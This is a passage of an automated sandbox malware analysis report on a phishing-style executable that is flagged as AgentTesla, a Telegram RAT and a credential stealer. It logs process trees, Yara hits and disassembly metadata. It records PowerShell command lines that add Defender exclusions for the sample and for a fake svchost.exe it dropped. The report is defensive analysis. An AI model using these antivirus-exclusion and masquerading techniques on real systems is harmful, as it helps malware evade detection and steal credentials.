                              Start date:14/01/2022
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff724c50000
                              File size:625664 bytes
                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              Chronological Activities

                              Analysis Process: conhost.exe PID: 1556 Parent PID: 7060

                              General

                              Start time:05:32:43
                              Start date:14/01/2022
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff724c50000
                              File size:625664 bytes
                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              Chronological Activities

                              Analysis Process: powershell.exe PID: 1472 Parent PID: 6588

                              General

                              Start time:05:32:43
                              Start date:14/01/2022
                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" -Force
                              Imagebase:0x1220000
                              File size:430592 bytes
                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:.Net C# or VB.NET

                              Chronological Activities

                              Analysis Process: conhost.exe PID: 4672 Parent PID: 1472

                              General

                              Start time:05:32:44
                              Start date:14/01/2022
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff724c50000
                              File size:625664 bytes
                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              Chronological Activities

                              Analysis Process: ComSvcConfig.exe PID: 4564 Parent PID: 6588

                              General

                              Start time:05:32:51
                              Start date:14/01/2022
                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe
                              Imagebase:0x1823aae0000
                              File size:173672 bytes
                              MD5 hash:2778AE0EB674B74FF8028BF4E51F1DF5
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              Chronological Activities

                              Analysis Process: aspnet_regbrowsers.exe PID: 7068 Parent PID: 6588

                              General

                              Start time:05:32:53
                              Start date:14/01/2022
                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                              Imagebase:0xfd0000
                              File size:45160 bytes
                              MD5 hash:B490A24A9328FD89155F075FA26C0DEC
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:.Net C# or VB.NET
                              Yara matches:
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001F.00000000.710933564.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000001F.00000000.710933564.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001F.00000000.710472370.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000001F.00000000.710472370.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001F.00000000.710080019.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000001F.00000000.710080019.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001F.00000002.755508340.00000000034D1000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000001F.00000002.755508340.00000000034D1000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001F.00000002.755508340.00000000034D1000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001F.00000000.709643389.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000001F.00000000.709643389.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001F.00000002.754034850.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000001F.00000002.754034850.0000000000402000.00000040.00000001.sdmp, Author: Joe Security

                              Chronological Activities

                              Analysis Process: svchost.exe PID: 4876 Parent PID: 3424

                              General

                              Start time:05:32:54
                              Start date:14/01/2022
                              Path:C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe"
                              Imagebase:0xbf0000
                              File size:844800 bytes
                              MD5 hash:8B974D65BF7E334D75F57027821AC628
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:.Net C# or VB.NET
                              Yara matches:
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000020.00000002.778887336.00000000046B1000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000020.00000002.778887336.00000000046B1000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000020.00000002.778887336.00000000046B1000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000020.00000002.778887336.00000000046B1000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000020.00000002.786901859.0000000005F70000.00000004.00020000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000020.00000002.786901859.0000000005F70000.00000004.00020000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000020.00000002.779987071.000000000474D000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000020.00000002.779987071.000000000474D000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000020.00000003.735522789.00000000067C2000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000020.00000002.775543622.00000000043E1000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000020.00000002.775543622.00000000043E1000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000020.00000002.775543622.00000000043E1000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000020.00000002.775543622.00000000043E1000.00000004.00000001.sdmp, Author: Joe Security
                              Antivirus matches:
                              • Detection: 19%, ReversingLabs

                              Chronological Activities

                              Analysis Process: svchost.exe PID: 1004 Parent PID: 568

                              General

                              Start time:05:32:56
                              Start date:14/01/2022
                              Path:C:\Windows\System32\svchost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                              Imagebase:0x7ff6eb840000
                              File size:51288 bytes
                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              Chronological Activities

                              Analysis Process: powershell.exe PID: 6008 Parent PID: 4876

                              General

                              Start time:05:33:02
                              Start date:14/01/2022
                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                              Imagebase:0x1220000
                              File size:430592 bytes
                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:.Net C# or VB.NET

                              Chronological Activities

                              Analysis Process: conhost.exe PID: 612 Parent PID: 6008

                              General

                              Start time:05:33:02
                              Start date:14/01/2022
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff724c50000
                              File size:625664 bytes
                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              Chronological Activities

                              Analysis Process: svchost.exe PID: 6712 Parent PID: 3424

                              General

                              Start time:05:33:03
                              Start date:14/01/2022
                              Path:C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe"
                              Imagebase:0xfb0000
                              File size:844800 bytes
                              MD5 hash:8B974D65BF7E334D75F57027821AC628
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:.Net C# or VB.NET
                              Yara matches:
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000024.00000003.773583087.0000000004B9C000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000024.00000002.850912152.0000000006330000.00000004.00020000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000024.00000002.850912152.0000000006330000.00000004.00020000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000024.00000002.842251291.0000000004AED000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000024.00000002.842251291.0000000004AED000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000024.00000003.756169106.0000000006B42000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000024.00000003.778067403.0000000004B45000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp, Author: Joe Security

                              Chronological Activities

                              Analysis Process: aspnet_regbrowsers.exe PID: 4588 Parent PID: 4876

                              General

                              Start time:05:33:09
                              Start date:14/01/2022
                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                              Imagebase:0xbe0000
                              File size:45160 bytes
                              MD5 hash:B490A24A9328FD89155F075FA26C0DEC
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:.Net C# or VB.NET
                              Yara matches:
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000025.00000000.745218195.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000025.00000000.745218195.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000025.00000000.744599446.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000025.00000000.744599446.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000025.00000000.744014270.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000025.00000000.744014270.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000025.00000002.939713877.0000000002F11000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000025.00000002.939713877.0000000002F11000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000025.00000002.939713877.0000000002F11000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000025.00000002.931661414.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000025.00000002.931661414.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000025.00000000.746142761.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000025.00000000.746142761.0000000000402000.00000040.00000001.sdmp, Author: Joe Security

                              Chronological Activities

                              Disassembly

                              Code Analysis

                              Reset < >

                                Analysis Process: #NEW ORDER FOR JANUARY 2022.exe PID: 6588 Parent PID: 5188 #NEW ORDER FOR JANUARY 2022.exeCOMMON

                                Execution Graph

                                Execution Coverage:14%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:0%
                                Total number of Nodes:82
                                Total number of Limit Nodes:4

                                Graph

                                execution_graph 26768 8114661 26769 811467e 26768->26769 26771 8114690 26768->26771 26772 8114699 26771->26772 26775 81138a4 26772->26775 26777 81138af 26775->26777 26779 8115490 26777->26779 26780 811549b 26779->26780 26781 81165de 26780->26781 26783 81167b8 26780->26783 26784 81167d9 26783->26784 26785 81167fd 26784->26785 26789 8116925 26784->26789 26794 8116968 26784->26794 26798 8116958 26784->26798 26785->26781 26790 8116937 26789->26790 26791 811697a 26789->26791 26790->26785 26792 81169ae 26791->26792 26802 81162d0 26791->26802 26792->26785 26795 8116975 26794->26795 26796 81169ae 26795->26796 26797 81162d0 3 API calls 26795->26797 26796->26785 26797->26796 26799 8116968 26798->26799 26800 81169ae 26799->26800 26801 81162d0 3 API calls 26799->26801 26800->26785 26801->26800 26803 81162db 26802->26803 26805 8116a20 26803->26805 26806 8116304 26803->26806 26805->26805 26807 811630f 26806->26807 26813 8116314 26807->26813 26809 8116a8f 26817 811baec 26809->26817 26825 811baf8 26809->26825 26810 8116ac8 26810->26805 26814 811631f 26813->26814 26815 81171ba 26814->26815 26816 81167b8 3 API calls 26814->26816 26815->26809 26816->26815 26819 811baf8 26817->26819 26818 811bb35 26818->26810 26819->26818 26834 811bd51 26819->26834 26838 811bd60 26819->26838 26820 811bb75 26841 811d041 26820->26841 26845 811d050 26820->26845 26827 811bb29 26825->26827 26829 811bc1a 26825->26829 26826 811bb35 26826->26810 26827->26826 26832 811bd51 2 API calls 26827->26832 26833 811bd60 2 API calls 26827->26833 26828 811bb75 26830 811d041 CreateWindowExW 26828->26830 26831 811d050 CreateWindowExW 26828->26831 26829->26810 26830->26829 26831->26829 26832->26828 26833->26828 26835 811bd60 26834->26835 26849 811bda0 26835->26849 26836 811bd6a 26836->26820 26840 811bda0 2 API calls 26838->26840 26839 811bd6a 26839->26820 26840->26839 26842 811d050 26841->26842 26843 811d121 26842->26843 26857 811e208 26842->26857 26847 811d07a 26845->26847 26846 811d121 26846->26846 26847->26846 26848 811e208 CreateWindowExW 26847->26848 26848->26846 26850 811bdaf 26849->26850 26851 811bddb 26850->26851 26855 811c029 LoadLibraryExW 26850->26855 26856 811c038 LoadLibraryExW 26850->26856 26851->26836 26852 811bdd3 26852->26851 26853 811bfd8 GetModuleHandleW 26852->26853 26854 811c005 26853->26854 26854->26836 26855->26852 26856->26852 26858 811d724 CreateWindowExW 26857->26858 26859 811e23d 26858->26859 26859->26843 26754 8115780 26755 81157e6 26754->26755 26756 8115895 26755->26756 26759 8115930 26755->26759 26762 8115940 26755->26762 26765 81153ec 26759->26765 26763 811596e 26762->26763 26764 81153ec DuplicateHandle 26762->26764 26763->26756 26764->26763 26766 81159a8 DuplicateHandle 26765->26766 26767 811596e 26766->26767 26767->26756

                                Executed Functions

                                Function 058144F0, Relevance: 1.8, Strings: 1, Instructions: 524COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 174 58144f0-5814502 175 581450a-5814524 174->175 328 5814504 call 58144f0 174->328 329 5814504 call 5814800 174->329 330 5814504 call 5814a2d 174->330 331 5814504 call 58144df 174->331 177 5814532-5814545 175->177 178 5814526-581452f 175->178 179 58147b5-58147b9 177->179 180 581454b-581454e 177->180 178->177 182 58147bb-58147cb 179->182 183 58147ce-58147d8 179->183 184 5814550-5814555 180->184 185 581455d-5814569 180->185 182->183 184->185 186 58147f3-581480e 185->186 187 581456f-5814581 185->187 193 5814810-5814814 186->193 194 5814815-5814839 186->194 191 5814587-58145da 187->191 192 58146ed-58146fb 187->192 223 58145ea 191->223 224 58145dc-58145e8 call 5814220 191->224 198 5814701-581470f 192->198 199 5814780-5814782 192->199 193->194 200 5814848-5814876 194->200 201 581483b-5814845 194->201 203 5814711-5814716 198->203 204 581471e-581472a 198->204 205 5814790-581479c 199->205 206 5814784-581478a 199->206 220 58149cb-58149e9 200->220 221 581487c-5814895 200->221 201->200 203->204 204->186 211 5814730-581475f 204->211 216 581479e-58147af 205->216 209 581478c 206->209 210 581478e 206->210 209->205 210->205 230 5814761-581476e 211->230 231 5814770-581477e 211->231 216->179 216->180 240 5814a54-5814a5e 220->240 241 58149eb-5814a0d 220->241 242 581489b-58148b1 221->242 243 58149ac-58149c5 221->243 227 58145ec-58145fc 223->227 224->227 238 5814617-5814619 227->238 239 58145fe-5814615 227->239 230->231 231->179 244 5814662-5814664 238->244 245 581461b-5814629 238->245 239->238 264 5814a5f-5814ab2 241->264 265 5814a0f-5814a2b 241->265 242->243 260 58148b7-58148f5 242->260 243->220 243->221 246 5814672-5814675 244->246 247 5814666-5814670 244->247 245->244 258 581462b-581463d 245->258 332 5814678 call 5814be0 246->332 333 5814678 call 5814bf0 246->333 247->246 261 58146bb-58146c7 247->261 257 581467e-5814682 262 5814684-5814692 257->262 263 58146ad-58146b0 257->263 272 5814643-5814647 258->272 273 581463f-5814641 258->273 301 58148fa-5814905 260->301 261->216 275 58146cd-58146dd 261->275 277 58146a5-58146a8 262->277 278 5814694-58146a3 262->278 324 58146b3 call 5814e48 263->324 325 58146b3 call 5814e58 263->325 295 5814ad2-5814b10 264->295 296 5814ab4-5814ad0 264->296 279 5814a4f-5814a52 265->279 270 58146b9 270->261 276 581464d-581465c 272->276 273->276 326 58146df call 58168a0 275->326 327 58146df call 58168b0 275->327 276->244 287 58147d9-58147ec 276->287 277->179 278->261 279->240 280 5814a39-5814a3c 279->280 280->264 283 5814a3e-5814a4e 280->283 283->279 287->186 291 58146e5-58146e8 291->179 296->295 304 5814907-581492d 301->304 305 581492f-5814953 301->305 304->305 314 5814985-581499e 305->314 315 5814955-581496c 305->315 317 58149a0 314->317 318 58149a9 314->318 321 5814978-5814983 315->321 322 581496e-5814971 315->322 317->318 318->243 321->314 321->315 322->321 324->270 325->270 326->291 327->291 328->175 329->175 330->175 331->175 332->257 333->257
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.737109449.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_5810000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID: k@'
                                • API String ID: 0-984539097
                                • Opcode ID: dbc7207378a1edc3af8bc7e039a4eb9d2152e8491e934170b24a7baf5db54e47
                                • Instruction ID: 8e0ec6adb7a685e2f6712ece9cf8fe795a53207e4c9a5068707b2630ece17b98
                                • Opcode Fuzzy Hash: dbc7207378a1edc3af8bc7e039a4eb9d2152e8491e934170b24a7baf5db54e47
                                • Instruction Fuzzy Hash: 4F126C34B102098FCB14DF69D494AAEB7FABF89714B258469ED06EB361DB31DC01CB94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0581E3D8, Relevance: .9, Instructions: 905COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.737109449.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_5810000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c2b81b434b8328b30edf2d092b17964c5c878ab37e90aeec89df1000e3ee1a60
                                • Instruction ID: 1984592b1a990bd9199c4d438232f7c83419d96da9473b6b89fb000606207404
                                • Opcode Fuzzy Hash: c2b81b434b8328b30edf2d092b17964c5c878ab37e90aeec89df1000e3ee1a60
                                • Instruction Fuzzy Hash: 86823974A00614CFDB24DF28C884A69BBB6FF89304F1581A9D94ADB361DB31ED81CF51
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0811C478, Relevance: .5, Instructions: 525COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.740666494.0000000008110000.00000040.00000010.sdmp, Offset: 08110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8110000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0d7a938509bbe85d7ebe65f245be5e0ae0173cc09b862068884ab36dcec0d587
                                • Instruction ID: cf688b3cba919027d0c02987705c4141cbc5a7ce8e41f4d238c602591cc702be
                                • Opcode Fuzzy Hash: 0d7a938509bbe85d7ebe65f245be5e0ae0173cc09b862068884ab36dcec0d587
                                • Instruction Fuzzy Hash: 32527AB1500706CFD718EF54E8881997BB3FB4AB28F905218C1626F6D8D3B465CADFA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 081139D4, Relevance: .3, Instructions: 314COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.740666494.0000000008110000.00000040.00000010.sdmp, Offset: 08110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8110000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: cde0375e50892d11793ea499193c4d8bc0fb4b4984e89da536f087ac639a4dd4
                                • Instruction ID: dfc64043648af76fdf4a1f33bb1de43200b97f3bbdd3530b8aa4c927d1e98f81
                                • Opcode Fuzzy Hash: cde0375e50892d11793ea499193c4d8bc0fb4b4984e89da536f087ac639a4dd4
                                • Instruction Fuzzy Hash: 65B1D071B50109CBDF08CFA8DD966DDB7F2AF88311B24816AE416FB394DB799D028B50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 081139E0, Relevance: .3, Instructions: 313COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.740666494.0000000008110000.00000040.00000010.sdmp, Offset: 08110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8110000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 82b0fe9d58ef263ec0145353428b1c148247345d5e9e0edb34a2cbb321e20e6e
                                • Instruction ID: 99a2fe8a4927078341d0b6cf8f8cf4b59324df314ca824a15bcfd615479b9d06
                                • Opcode Fuzzy Hash: 82b0fe9d58ef263ec0145353428b1c148247345d5e9e0edb34a2cbb321e20e6e
                                • Instruction Fuzzy Hash: 1FB1E071B501098BDF08CBA8DD966DDB7F2AF88311B24816AE406FB394DB799D028B50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 05814E58, Relevance: 1.8, Strings: 1, Instructions: 587COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 0 5814e58-5814e72 1 5814e79-5814ea0 0->1 2 5814e74 call 5814bf0 0->2 5 5814ea2-5814ea4 1->5 6 5814ea6-5814eaa 1->6 2->1 7 5814eb0-5814ed3 5->7 6->7 12 5814ed5-5814eda 7->12 13 5814edf-5814eeb 7->13 14 5814fbb-5814fc1 12->14 18 5814eed-5814efe call 58144f0 13->18 19 5814f1e-5814f2a 13->19 15 5814fc3 14->15 16 5814fc7-5814fe7 14->16 15->16 30 5814ff3-5815008 16->30 31 5814fe9-5814fee 16->31 27 5814f03-5814f19 18->27 23 5814f36-5814f4a 19->23 24 5814f2c-5814f31 19->24 37 5814fb6 23->37 38 5814f4c-5814f6e 23->38 24->14 27->14 44 581508b 30->44 45 581500e-581501e 30->45 34 5815090-581509e 31->34 40 58150a0-58150a4 34->40 41 58150b6-58150c2 34->41 37->14 56 5814f70-5814f92 38->56 57 5814f94-5814fad 38->57 46 58150ac-58150ae 40->46 49 58151a6-58151da 41->49 50 58150c8-58150e4 41->50 44->34 53 5815020-5815030 45->53 54 5815032-5815037 45->54 46->41 75 58151f2-58151f4 49->75 76 58151dc-58151f0 49->76 65 5815192-58151a0 50->65 53->54 60 5815039-5815049 53->60 54->34 56->37 56->57 57->37 77 5814faf-5814fb4 57->77 73 5815052-5815062 60->73 74 581504b-5815050 60->74 65->49 70 58150e9-58150f2 65->70 71 58153b1-58153c6 70->71 72 58150f8-581510b 70->72 89 58153c8-58153cc 71->89 90 58153cd-58153d8 71->90 72->71 78 5815111-5815123 72->78 87 5815064-5815069 73->87 88 581506b-581507b 73->88 74->34 80 5815224-5815264 75->80 81 58151f6-5815208 75->81 76->75 77->14 92 5815125-5815131 78->92 93 581518f 78->93 169 5815266 call 5815a91 80->169 170 5815266 call 5815aa0 80->170 81->80 97 581520a-581521c 81->97 87->34 104 5815084-5815089 88->104 105 581507d-5815082 88->105 89->90 95 581546c-58154bd 90->95 96 58153de-58153e0 90->96 92->71 98 5815137-581518c 92->98 93->65 131 58154cd-58154d7 95->131 132 58154bf-58154cc 95->132 96->95 101 58153e6-58153e8 96->101 97->80 98->93 101->95 106 58153ee-58153f2 101->106 104->34 105->34 106->95 107 58153f4-58153f8 106->107 110 581540a-581544c 107->110 111 58153fa-5815408 107->111 109 581526c-5815280 123 5815282-5815299 109->123 124 58152c7-58152de 109->124 118 5815454-5815469 110->118 111->118 137 58152a7-58152bf call 58144f0 123->137 138 581529b-58152a5 123->138 171 58152e0 call 5816589 124->171 172 58152e0 call 5816598 124->172 173 58152e0 call 58166b8 124->173 140 58154e6-58154ec 131->140 141 58154d9-58154e4 131->141 134 58152e6-5815314 150 5815316-581532f 134->150 151 5815368-581537f 134->151 137->124 138->137 149 58154ee-5815534 140->149 141->149 158 5815331 150->158 159 5815339-5815365 150->159 156 5815381-581538a 151->156 157 58153a5-58153ae 151->157 167 581538d call 581bc28 156->167 168 581538d call 581bc38 156->168 158->159 159->151 161 5815393-581539c 161->157 167->161 168->161 169->109 170->109 171->134 172->134 173->134
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.737109449.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_5810000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID: #e
                                • API String ID: 0-1732277802
